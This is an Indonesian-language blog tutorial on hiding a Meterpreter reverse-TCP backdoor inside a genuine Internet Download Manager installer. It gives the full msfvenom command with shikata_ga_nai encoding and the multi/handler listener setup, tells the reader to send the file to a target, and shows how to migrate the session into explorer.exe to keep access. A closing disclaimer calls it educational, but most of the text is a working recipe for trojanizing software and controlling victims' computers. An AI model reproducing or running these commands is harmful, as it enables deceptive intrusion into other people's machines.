Menyamarkan Backdoor Seperti File Installer (.exe)

Sebelum melakukan eksploitasi ke sebuah sistem kita memerlukan backdoor yang digunakan untuk jalan masuk ke sistem korban. Agar exploit tersebut berjalan user diharuskan mengeksekusi backdoor tersebut, untuk itu kita diharuskan se-kreatif mungkin agar user tersebut mengesekusi backdoor yang dikirimkan, contohnya dengan menyamarkan backdoor  menyerupai file installer aplikasi.

Sebagai contoh kali ini saya akan menyamarkan backdoor seperti Installer Internet Download Manager (kalian juga dapat mencoba dengan file installer lainnya), disini tools yang digunakan adalah msfvenom dengan encoder shikata_ga_nai.

untuk melihat opsi dari perintah msfvenom ketikkan di terminal

msfvenom -h

Contoh disini file asli installer IDM saya berada di /root/Download/idman625build11.exe  dan hasil file outputnya akan saya simpan di folder /root/Desktop/IDMan.exe 

msfvenom -a x86 --platform windows -x /root/Downloads/idman625build11.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o /root/Desktop/IDMan.exe

Keterangan :
- a adalah architecture yang digunakan
--platform adalah platform payload yang di buat

-x posisi atau letak file exe yang hendak di injeksi
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikkan payload sebagai thread baru
-p perintah untuk menentukan tipe payload
windows/meterpreter/reverse_tcp adalah tipe payload yang digunakan 

-lhost adalah alamat IP kita

-lport adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
-e untuk memilih encoder yang digunakan
x86/shikata_ga_nai adalah encoder yang digunakan

-i iterations (jumlah encode payload)

-f format output

-o output hasil file yang telah di injeksi ( backdoor result )

Oke, selanjutnya kita uji coba backdoor tersebut, buka msfconsole

msfconsole

Selanjutnya gunakan perintah

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 4444
exploit

Sesuaikan tipe PAYLOAD, LHOST dan LPORT dengan backdoor yang dibuat di atas

Langkah selanjutnya adalah mengirimkan backdoor tersebut ke target

Dibawah ini penampakan backdoor di komputer target

dilihat sepintas backdoor tersebut menyerupai file installer aslinya, icon dan detailnya pun sama 

Penampakan IDMan.exe di eksekusi

Dan , Sesi meterpreter terbuka  :D

Meterpreter session akan closed, ketika target menutup file Installer tersebut, untuk  itu segera pindah ke prosses yang lain agar kita tetap mendapat sesi meterpreter, gunakan perintah

migrate 6108

Contoh di atas saya pindah ke explorer.exe , untuk melihat Procces List ketikkan

ps

Kita akan tetap terhubung dengan komputer target sampai koneksi target terputus atau target mematikan komputernya, nah bagaimana agar kita dapat masuk ke komputer target tanpa harus mengirimkan backdoor kembali? kita bisa membuat backdoor persistence, maksudnya adalah kita membuat backdoor permanen di dalam komputer target dan akan otomotis berjalan ketika startup, untuk caranya bisa di lihat pada postingan saya sebelumnya di Maintaining Acces dengan Persistence Metasploit.

Oke mungkin cukup itu yang bisa saya share kali ini tentang Cara Menyamarkan Backdoor Seperti File Installer, postingan ini ditujukan hanya untuk pemebelajaran semata, penyalahgunaan dari tutorial ini bukan tanggung jawab saya. Terimakasih

sumber www.offensive-security.com